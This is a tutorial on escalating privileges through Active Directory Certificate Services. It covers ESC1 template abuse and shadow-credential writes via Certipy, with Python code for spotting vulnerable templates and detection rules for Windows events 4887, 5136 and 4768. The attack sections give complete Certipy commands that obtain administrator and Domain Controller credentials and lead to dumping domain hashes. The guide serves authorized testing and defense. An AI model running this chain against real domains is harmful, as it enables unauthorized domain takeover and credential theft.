Mastering AD CS Escalation: A Practical Guide to Exploiting Certificate Services

Overview

Active Directory Certificate Services (AD CS) is a critical component for managing public key infrastructure (PKI) in Windows environments. While it provides essential services like certificate enrollment and authentication, misconfigurations in certificate templates and the misuse of shadow credentials can allow attackers to escalate privileges and move laterally. This guide dissects these advanced exploitation techniques and offers behavioral detection strategies for defenders. By understanding both offensive and defensive perspectives, you can harden your AD CS infrastructure against real-world attacks.

Source: unit42.paloaltonetworks.com

Prerequisites

Before diving into exploitation, ensure you have the following:

  • Access to an Active Directory environment with AD CS installed (test lab recommended).
  • Administrative privileges on a domain-joined machine or a compromised account with certificate enrollment rights.
  • Tools: Certipy (Python-based AD CS exploitation framework), Impacket, BloodHound, and a Windows machine with certreq command-line utility. Install Certipy via pip: pip install certipy-ad.
  • Basic knowledge of Active Directory, PKI concepts, and PowerShell.

Step-by-Step Instructions

Exploiting Certificate Template Misconfigurations

Certificate templates define the policy under which the CA issues certificates. The template abuse known as ESC1 needs several settings to line up on one template: low-privileged principals (Authenticated Users, Domain Users, Domain Computers) hold Enroll rights; the template lets the enrollee supply the subject name (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT); issuance needs neither manager approval nor authorized signatures; and the EKUs permit authentication (Client Authentication, Smart Card Logon, PKINIT Client Authentication, Any Purpose, or no EKU at all). The attacker then requests a certificate whose Subject Alternative Name carries a high-privileged account's UPN (for example administrator, a Domain Admin), and the CA issues it as a perfectly valid certificate that logs on as that account.

  1. Identify vulnerable templates with Certipy (or the certificate-template edges in BloodHound). Run:
    certipy find -u user@domain.local -p 'password' -dc-ip 10.0.0.1
    In the report, look for templates where Enrollment Rights include Authenticated Users or Domain Users, Enrollee Supplies Subject is True, Requires Manager Approval is False, and the Extended Key Usage list contains Client Authentication or another logon EKU. Adding -vulnerable to the command limits the report to templates Certipy already rates as exploitable.
  2. Request a certificate carrying a privileged user's UPN in the SAN. Use Certipy:
    certipy req -u user@domain.local -p 'password' -ca 'CA-SERVER\CA-NAME' -template 'VulnTemplate' -upn 'administrator@domain.local'
    Certipy saves the issued certificate and its private key as administrator.pfx. Nothing is forged here: the CA signed exactly what it was asked to sign.
  3. Authenticate with the PFX over PKINIT: certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1. Certipy obtains a TGT for the account named in the SAN and, through a U2U request, that account's NT hash; either the ticket or the hash can then be used with Impacket against domain resources.

For a deeper dive, see the Behavioral Detection section to spot this activity.
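Step 1 leaves the reader to eyeball Certipy's report, but the checks that make a template ESC1 are mechanical, so here they are as code. This is an added example, not Certipy's own logic: it runs on constructed template records whose fields mirror the LDAP attributes behind the report (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage and the SIDs granted Enroll) rather than on certipy find output, and the template names and domain SID are made up.

```python
"""ESC1 triage over certificate-template records (added example, not Certipy code).

The records below are constructed to mirror the LDAP attributes Certipy reads:
msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature,
pKIExtendedKeyUsage and the SIDs granted Enroll. Dict keys are this example's
own naming and the domain SID is made up.
"""

# Bit in msPKI-Certificate-Name-Flag: the requester supplies the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: every request pends for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that let a certificate authenticate to AD (PKINIT or Schannel).
AUTHENTICATION_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals that amount to "any domain account can enroll".
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}  # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515"}           # Domain Users, Domain Computers


def is_low_priv(sid: str) -> bool:
    """True for broad well-known groups; False for specific or admin principals."""
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def esc1_reasons(template: dict) -> list:
    """Which ESC1 preconditions the template meets; all five must hold for ESC1."""
    reasons = []
    if template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject")
    if not template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval")
    if template["ra_signatures"] == 0:
        reasons.append("no authorized signatures required")
    # No EKU at all means the cert is good for any purpose, including logon.
    if not template["ekus"] or template["ekus"] & AUTHENTICATION_EKUS:
        reasons.append("authentication EKU")
    if any(is_low_priv(sid) for sid in template["enroll_sids"]):
        reasons.append("low-privileged enrollment rights")
    return reasons


def find_esc1(templates: list) -> list:
    """Names of the templates that satisfy every one of the five ESC1 preconditions."""
    return [t["name"] for t in templates if len(esc1_reasons(t)) == 5]


DOM = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID
SAMPLE_TEMPLATES = [
    {   # Textbook ESC1: any user enrolls, chooses the SAN, and the cert logs on.
        "name": "VulnTemplate",
        "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": 0,
        "ra_signatures": 0,
        "ekus": {"1.3.6.1.5.5.7.3.2"},
        "enroll_sids": {f"{DOM}-513"},
    },
    {   # Same template but issuance pends for manager approval: not ESC1.
        "name": "ApprovedWebServer",
        "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": CT_FLAG_PEND_ALL_REQUESTS,
        "ra_signatures": 0,
        "ekus": {"1.3.6.1.5.5.7.3.2"},
        "enroll_sids": {"S-1-5-11"},
    },
    {   # Subject is built from AD, so the requester cannot pick a UPN: not ESC1.
        "name": "User",
        "name_flag": 0,
        "enrollment_flag": 0,
        "ra_signatures": 0,
        "ekus": {"1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"},
        "enroll_sids": {f"{DOM}-513"},
    },
    {   # Only Domain Admins (RID 512) hold Enroll: dangerous flags, no exposure.
        "name": "AdminOnly",
        "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": 0,
        "ra_signatures": 0,
        "ekus": set(),
        "enroll_sids": {f"{DOM}-512"},
    },
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(f"{t['name']:<18} {', '.join(esc1_reasons(t))}")
    print("ESC1 candidates:", find_esc1(SAMPLE_TEMPLATES))
```

The partial matches are worth reading too: ApprovedWebServer fails only on manager approval, so a CA manager who rubber-stamps pending requests turns it into ESC1; AdminOnly fails only on enrollment rights, so any ACL change granting Enroll more broadly does the same.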

Shadow Credentials Misuse

Shadow credentials involve adding a certificate-based credential to a target computer or user object via the msDS-KeyCredentialLink attribute. This allows an attacker to authenticate as that object using PKINIT (Kerberos with certificates).

  1. Enumerate objects on which the attacker's principal can write msDS-KeyCredentialLink (GenericAll, GenericWrite, or WriteProperty on that attribute). BloodHound's AddKeyCredentialLink edge or PowerView's Get-DomainObjectAcl will show these.
  2. Add a shadow credential to the target, here the machine account of a Domain Controller. With Certipy:
    certipy shadow add -u attacker@domain.local -p 'pass' -account 'dc01$' -dc-ip 10.0.0.1
    Certipy generates a key pair and a self-signed certificate, appends the public key to the target's msDS-KeyCredentialLink, prints the DeviceID of the new entry (keep it for cleanup), and saves the certificate as dc01.pfx. (certipy shadow auto performs add, authenticate and remove in one step.)
  3. Authenticate as the target with the generated certificate: certipy auth -pfx dc01.pfx -dc-ip 10.0.0.1. This yields a TGT and NT hash for DC01$. A DC machine account holds directory replication rights, so those credentials are enough to DCSync every hash in the domain (for example with Impacket's secretsdump).

Note: Shadow credentials need neither the target's password nor its hash, survive password changes, and stay valid until the msDS-KeyCredentialLink entry is removed. PKINIT must be available in the domain, which means at least one DC holds a Domain Controller or Kerberos Authentication certificate; wherever AD CS is deployed this is normally the case. Watch for PKINIT TGT requests for machine accounts arriving from hosts other than the machine itself, and for writes to msDS-KeyCredentialLink by principals other than the object owner (see detection below).


Behavioral Detection for Defenders

Defenders can spot AD CS abuse through audit logs and network telemetry. Key indicators:

  • Certificate enrollment events (Security log on the CA server, with Certification Services auditing enabled): Event ID 4886 (Certificate Services received a certificate request) and 4887 (Certificate Services approved a certificate request and issued a certificate); 4888 records a denied request. The Requester and Attributes fields show who enrolled and against which template; look for low-privileged requesters using templates that allow a supplied subject. 4887 does not record the SAN, so to see which name was actually issued, inspect the certificate or the CA database (certutil -view).
  • Shadow credential additions: Event ID 5136 (A directory service object was modified) with AttributeLDAPDisplayName msDS-KeyCredentialLink and an OperationType of value added. This needs the Audit Directory Service Changes subcategory plus a write SACL on the objects you care about; correlate SubjectUserName with ObjectDN, because the writer is normally the object itself.
  • PKINIT authentication: Event ID 4768 (A Kerberos authentication ticket (TGT) was requested) with the Certificate Information fields (issuer name, serial number, thumbprint) populated. Flag machine accounts authenticating from an IP other than their own, and any certificate whose issuer is not your enterprise CA (shadow credential certificates are self-signed).

Implement monitoring with Windows Event Forwarding and SIEM rules. Use PowerShell to pull the events behind a rule: Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} on a Domain Controller, or ID=4887 on the CA server.
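The three indicators above, together with the shadow-credential pattern from the previous section, as runnable rules. This is an added example, not code from the original page or from any product ruleset: events are dicts whose keys mirror the EventData field names of 4887, 5136 and 4768, while the sample events, hostnames, IPs, the CA name CA-NAME and the inventory sets (enterprise CAs, watched templates, allowed requesters, machine-to-IP map, permitted KeyCredentialLink writers) are constructed assumptions to replace with your own.

```python
"""Rules for the 4887 / 5136 / 4768 indicators, run over constructed events.

Added example, not from the original page or any vendor ruleset. Each event is
a dict whose keys mirror the EventData field names of the Windows event; the
values, hosts, IPs, the CA name and the inventory sets are assumptions.
"""
import re

ENTERPRISE_CAS = {"CA-NAME"}                        # issuer names your CA stamps on certs
SAN_TEMPLATES = {"VulnTemplate"}                    # subject-supplied templates from certipy find
TEMPLATE_ALLOWLIST = {"VulnTemplate": {"svc-web"}}  # requesters expected to use them
MACHINE_IPS = {"DC01$": "10.0.0.1", "WS01$": "10.0.0.50"}
KCL_WRITERS = {"svc-intune"}                        # provisioning accounts allowed to write the attribute
VALUE_ADDED = "%%14674"                             # 5136 OperationType: value added (%%14675 = deleted)


def template_of(attributes: str):
    """Pull the template name from a 4887 'Attributes' string."""
    m = re.search(r"CertificateTemplate:(\S+)", attributes)
    return m.group(1) if m else None


def account_of(requester: str) -> str:
    """'DOMAIN\\user' -> 'user'."""
    return requester.split("\\")[-1]


def strip_v4_mapped(ip: str) -> str:
    """4768 logs IPv4 clients as ::ffff:a.b.c.d."""
    return ip[7:] if ip.startswith("::ffff:") else ip


def check_4887(ev):
    """CA side: issuance from a SAN-supplying template by an unexpected requester."""
    tpl = template_of(ev.get("Attributes", ""))
    who = account_of(ev["Requester"])
    if tpl in SAN_TEMPLATES and who not in TEMPLATE_ALLOWLIST.get(tpl, set()):
        return f"4887: {who} obtained a cert from subject-supplied template {tpl} (RequestId {ev['RequestId']})"
    return None


def check_5136(ev):
    """DC side: someone other than the object itself adds a key credential."""
    if ev["AttributeLDAPDisplayName"].lower() != "msds-keycredentiallink":
        return None
    if ev["OperationType"] != VALUE_ADDED:
        return None
    writer, obj = ev["SubjectUserName"], ev["ObjectDN"]
    # Devices write their own KeyCredentialLink (Windows Hello / NGC); a different
    # principal writing it on a DC or user object is the shadow-credentials pattern.
    self_write = obj.upper().startswith(f"CN={writer.rstrip('$').upper()},")
    if writer in KCL_WRITERS or self_write:
        return None
    return f"5136: {writer} added msDS-KeyCredentialLink on {obj}"


def check_4768(ev):
    """KDC side: PKINIT with a non-CA cert, or a machine account from the wrong host."""
    if not ev.get("CertThumbprint"):
        return None  # password pre-auth: Certificate Information is empty
    target, issuer = ev["TargetUserName"], ev["CertIssuerName"]
    ip = strip_v4_mapped(ev["IpAddress"])
    if issuer not in ENTERPRISE_CAS:
        # Shadow-credential certs are self-signed; the KDC trusts the key, not a CA.
        return f"4768: PKINIT as {target} with cert issued by '{issuer}', not an enterprise CA"
    if target.endswith("$") and MACHINE_IPS.get(target) not in (None, ip):
        return f"4768: PKINIT as {target} from {ip}, expected {MACHINE_IPS[target]}"
    return None


RULES = {"4887": check_4887, "5136": check_5136, "4768": check_4768}


def run_rules(events):
    """Apply the matching rule to each event; return the alert strings in order."""
    alerts = []
    for ev in events:
        rule = RULES.get(ev["EventID"])
        hit = rule(ev) if rule else None
        if hit:
            alerts.append(hit)
    return alerts


SAMPLE_EVENTS = [  # constructed; field names follow the real events, values do not
    {"EventID": "4887", "Requester": "DOMAIN\\user", "RequestId": "1042",
     "Attributes": "CertificateTemplate:VulnTemplate"},
    {"EventID": "4887", "Requester": "DOMAIN\\svc-web", "RequestId": "1043",
     "Attributes": "CertificateTemplate:VulnTemplate"},
    {"EventID": "5136", "SubjectUserName": "attacker", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=domain,DC=local"},
    {"EventID": "5136", "SubjectUserName": "WS01$", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "ObjectDN": "CN=WS01,CN=Computers,DC=domain,DC=local"},
    # Shadow credential: DC01$ logs on from an attacker host with a self-signed cert.
    {"EventID": "4768", "TargetUserName": "DC01$", "IpAddress": "::ffff:10.0.0.99",
     "CertIssuerName": "DC01$", "CertThumbprint": "AA11"},
    # ESC1 logon: the CA really issued this cert, so at the KDC it looks like any
    # smart-card logon. Not flagged here; the 4887 rule above is what catches the chain.
    {"EventID": "4768", "TargetUserName": "administrator", "IpAddress": "::ffff:10.0.0.99",
     "CertIssuerName": "CA-NAME", "CertThumbprint": "BB22"},
    {"EventID": "4768", "TargetUserName": "user", "IpAddress": "::ffff:10.0.0.50",
     "CertIssuerName": "", "CertThumbprint": ""},
]

if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(alert)
```

Note what the 4768 rules cannot do: the ESC1 logon as administrator uses a certificate the enterprise CA genuinely issued, so on the KDC it is indistinguishable from a smart-card logon. Catching that chain depends on the CA-side 4887 rule, or on joining the thumbprint from 4768 back to the CA database to see which requester obtained the certificate.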

Common Mistakes

  • Using production credentials in a lab: test in an isolated environment. A certificate issued for a real admin account is a live credential until it expires or is revoked.
  • Neglecting certificate expiry: an issued certificate stays valid for the validity period set on the template (often a year or more), and shadow-credential entries do not expire at all. Record what you issued so it can be revoked or removed, and request a fresh certificate if one expires mid-engagement.
  • Misconfiguring template permissions: enrollment needs both the Request Certificates permission on the CA and Enroll on the template; if a request is denied (event 4888), check both.
  • Shadow credential cleanup: remove the added entry after testing so it does not remain as persistence: certipy shadow remove -u attacker@domain.local -p 'pass' -account 'dc01$' -device-id <DeviceID printed by the add step>. certipy shadow clear removes every entry, including legitimate Windows Hello keys, so prefer remove.
  • Ignoring detection logs during testing: operate only with explicit written authorization, and tell the SOC when and from where you are testing, so the resulting alerts are expected and can be used to confirm that the detections fire.

Summary

AD CS escalation via template misconfigurations and shadow credential abuse is a potent vector for privilege escalation. By following this guide, you can simulate these attacks to validate your defenses. Key takeaways: (1) identify vulnerable templates using automated tools, (2) leverage Certipy for certificate requests and shadow credential manipulation, and (3) monitor for specific Windows Events to detect misuse. Always operate in a controlled environment and document findings. For further reading, explore Certipy documentation and Unit 42's original analysis.
